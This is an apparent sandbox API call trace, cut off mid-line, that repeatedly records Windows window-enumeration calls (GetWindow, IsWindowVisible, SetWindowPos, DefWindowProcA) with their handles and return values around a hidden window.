[0057.528] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.528] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.528] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.528] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.528] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.528] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.528] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.528] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.528] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.528] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.528] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.528] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.528] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.528] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.528] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.528] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.528] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.528] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.528] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.528] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.528] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.528] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.528] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.528] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.528] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.528] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.529] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.529] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.529] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.529] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.529] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.529] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.529] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.529] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.529] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.529] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.529] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.529] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.529] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.529] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.529] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.529] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.529] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.529] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.529] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.529] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.529] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.529] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.529] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.529] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.529] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.530] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.530] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.530] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.530] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.530] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.530] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.530] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.530] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.530] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.530] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.530] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.530] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.530] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.530] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.530] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.530] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.530] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.530] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.530] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.530] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.530] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.530] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.530] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.530] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.531] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.531] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.531] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.531] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.531] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.531] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.531] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.531] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.531] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.531] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.531] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.531] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.531] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.531] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.531] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.531] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.531] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.531] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.531] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.531] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.531] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.531] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.531] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.531] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.532] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.532] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.532] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.532] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.532] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.532] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.532] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.532] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.532] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.532] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.532] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.532] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.532] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.532] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.532] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.532] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.532] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.532] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.532] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.532] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.532] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.532] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.532] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.532] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.533] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.533] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.533] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.533] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.533] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.533] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.533] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.533] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.533] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.533] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.533] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.533] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.533] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.533] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.533] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.533] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.533] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.533] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.533] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.533] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.533] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.533] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.533] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.533] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.533] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.533] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.533] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.533] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.534] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.534] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.534] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.534] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.534] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.534] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.534] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.534] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.534] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.534] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.534] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.534] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.534] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.534] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.534] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.534] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.534] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.534] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.534] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.534] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.534] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.534] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.534] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.534] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.534] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.534] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.534] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.534] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.534] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.534] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.534] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.534] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.535] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.535] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.535] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.535] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.535] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.535] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.535] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.535] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.535] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.535] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.535] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.535] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.535] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.535] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.535] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.535] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.535] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.535] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.535] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.535] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.535] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.535] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.535] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.535] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.535] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.535] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.535] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.535] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.535] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.535] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.535] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.535] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.536] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.536] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.536] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.536] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.536] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.536] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.536] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.536] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.536] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.536] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.536] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.536] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.536] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.536] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.536] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.536] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.536] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.536] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.536] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.536] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.536] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.536] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.536] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.536] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.536] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.536] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.536] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.536] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.536] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.536] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.536] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.537] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.537] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.537] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.537] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.537] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.537] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.537] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.537] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.537] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.537] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.537] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.537] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.537] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.537] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.537] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.537] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.537] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.537] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.537] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.537] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.537] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.537] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.537] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.537] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.537] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.537] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.537] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.537] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.537] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.538] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.538] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.538] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.538] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.538] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.538] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.538] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.538] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.538] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.538] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.538] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.538] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.538] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.538] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.538] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.538] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.538] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.538] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.538] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.538] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.538] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.538] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.538] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.538] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.539] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.539] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.539] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.539] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.539] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.539] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.539] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.539] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.539] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.539] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.539] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.539] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.539] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.539] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.539] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.539] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.539] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.539] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.539] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.539] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.539] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.539] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.539] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.539] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.539] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.540] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.540] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.540] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.540] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.540] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.540] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.540] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.540] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.540] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.540] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.540] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.540] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.540] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.540] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.540] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.540] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.540] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.540] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.540] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.540] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.540] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.540] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.540] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.540] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.541] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.541] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.541] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.541] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.541] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.541] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.541] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.541] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.541] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.541] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.541] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.541] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.541] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.541] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.541] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.541] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.541] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.541] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.541] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.541] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.541] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.541] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.541] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.541] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.541] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.542] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.542] GetWindow (hWnd=0x20026, 